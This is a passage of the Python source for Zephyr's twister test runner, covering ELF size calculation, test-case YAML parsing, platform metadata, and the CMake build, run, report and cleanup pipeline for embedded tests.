self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
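# e.g. (illustrative) a source line such as
#   ztest_unit_test(test_mutex_lock),
# matches with stc_name == b"test_mutex_lock"; scan_file() later strips the
# leading "test_" so the reported subcase becomes "mutex_lock".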
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise TwisterRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# On Windows we only support building; running the tests there is still
# a work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--err-on-deprecated-properties"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}"',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
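# Summary of the handler selection above (derived from the branches, no new behavior):
#   qemu simulation        -> QEMUHandler driven through `make run`, with a QEMU_PIPE arg
#   unit test type         -> BinaryHandler on <build_dir>/testbinary (COVERAGE=1 if enabled)
#   native platform type   -> BinaryHandler on zephyr/zephyr.exe, sanitizer/valgrind aware
#   renode / tsim / nsim / armfvp simulation -> BinaryHandler via `make run` (mdb-nsim via west flash)
#   --device-testing       -> DeviceHandler with coverage passed through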
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
